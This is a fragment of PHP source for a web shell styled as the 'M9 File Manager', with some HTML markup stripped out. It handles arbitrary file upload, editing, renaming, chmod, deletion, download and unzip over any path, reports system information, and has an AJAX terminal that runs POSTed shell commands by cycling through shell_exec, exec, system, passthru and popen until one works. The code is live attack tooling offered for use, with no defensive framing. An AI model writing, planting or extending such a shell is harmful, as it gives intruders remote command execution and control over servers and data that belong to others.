✓ ' . $t . ''; } function err($t) { return '✗ ' . $t . ''; } // Path $currentPath = isset($_GET['p']) ? $_GET['p'] : (@getcwd() ?: '.'); $currentPath = rtrim(str_replace(['\\', '//'], '/', $currentPath), '/') . '/'; if (!@is_dir($currentPath)) $currentPath = './'; // Actions $message = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_FILES['upload'])) { $dst = $currentPath . basename($_FILES['upload']['name']); $message = (@move_uploaded_file($_FILES['upload']['tmp_name'], $dst) || writeFile($dst, readFileContent($_FILES['upload']['tmp_name']))) ? ok('Uploaded') : err('Upload failed'); } if (isset($_POST['new'])) { $path = $currentPath . $_POST['new']; if (isset($_POST['type']) && $_POST['type'] === 'dir') { $message = @mkdir($path) ? ok('Folder created') : err('Failed'); } else { $message = writeFile($path, isset($_POST['content']) ? $_POST['content'] : '') ? ok('File created') : err('Failed'); } } if (isset($_POST['save'], $_POST['data'])) { $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? ok('Saved') : err('Save failed'); } if (isset($_POST['oldname'], $_POST['newname'])) { $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? ok('Renamed') : err('Failed'); } if (isset($_POST['chmod_item'], $_POST['chmod_value'])) { $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ? ok('Permissions changed') : err('Failed'); } } // ── CMD AJAX handler ────────────────────────────────────────────────────────── if (isset($_GET['ajax_cmd'])) { header('Content-Type: application/json'); $cmd = isset($_POST['c']) ? trim($_POST['c']) : ''; $out = ''; if ($cmd !== '') { // try every execution method in order if (function_exists('shell_exec')) { $out = @shell_exec($cmd . ' 2>&1'); } if (($out === null || $out === '') && function_exists('exec')) { $lines = array(); @exec($cmd . ' 2>&1', $lines); $out = implode("\n", $lines); } if (($out === null || $out === '') && function_exists('system')) { ob_start(); @system($cmd . ' 2>&1'); $out = ob_get_clean(); } if (($out === null || $out === '') && function_exists('passthru')) { ob_start(); @passthru($cmd . ' 2>&1'); $out = ob_get_clean(); } if (($out === null || $out === '') && function_exists('popen')) { $h = @popen($cmd . ' 2>&1', 'r'); if ($h) { $out = @fread($h, 65536); @pclose($h); } } if ($out === null) $out = ''; } $cwd = function_exists('getcwd') ? @getcwd() : '?'; echo json_encode(array('out' => $out, 'cwd' => $cwd ? $cwd : '?')); exit; } if (isset($_GET['action'])) { $item = isset($_GET['item']) ? $_GET['item'] : ''; $itemPath = $currentPath . $item; if ($_GET['action'] === 'delete') { if (@is_file($itemPath)) $message = @unlink($itemPath) ? ok('Deleted') : err('Failed'); elseif (@is_dir($itemPath)) $message = @rmdir($itemPath) ? ok('Deleted') : err('Failed'); } elseif ($_GET['action'] === 'download' && @is_file($itemPath)) { @ob_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($itemPath) . '"'); @readfile($itemPath); exit; } elseif ($_GET['action'] === 'unzip' && @is_file($itemPath)) { if (!class_exists('ZipArchive')) { $message = err('ZipArchive extension not available on this server'); } else { $zip = new ZipArchive(); $res = $zip->open($itemPath); if ($res === true) { // Extract into a subfolder named after the zip (without extension) $extractTo = $currentPath . pathinfo($item, PATHINFO_FILENAME) . '/'; if (!@is_dir($extractTo)) @mkdir($extractTo, 0755, true); $zip->extractTo($extractTo); $zip->close(); $message = ok('Extracted to ' . htmlspecialchars(basename($extractTo)) . '/'); } else { $errCodes = [ ZipArchive::ER_NOZIP => 'Not a zip file', ZipArchive::ER_INCONS => 'Inconsistent zip archive', ZipArchive::ER_CRC => 'CRC error', ZipArchive::ER_NOENT => 'File not found', ]; $message = err('Cannot open zip: ' . (isset($errCodes[$res]) ? $errCodes[$res] : 'Error #' . $res)); } } } } // Scan $items = array_diff(scanDirectory($currentPath), ['.', '..']); $folders = $files = []; foreach ($items as $item) { @is_dir($currentPath . $item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); $sysInfo = ['PHP' => @phpversion(), 'OS' => @php_uname('s'), 'User' => @get_current_user(), 'CWD' => @getcwd()]; // ─── LOGIN PAGE ─────────────────────────────────────────────────────────────── function showLogin($error = '') { ?> M9 :: Login
Secured — Unauthorized access prohibited
M9 File Manager

M9

FILE MANAGER
$v): ?> :
✕ Logout
⌂ Root /
▶ CMD 📁 Files ← Close Editor
▶ Terminal
// type a command and press Enter or Run
✎ Editing:
Cancel
Name Size Perms Modified Actions
Parent Directory
📁
Delete
📄 📄
Edit 🔖 Unzip Download Delete
📁 This directory is empty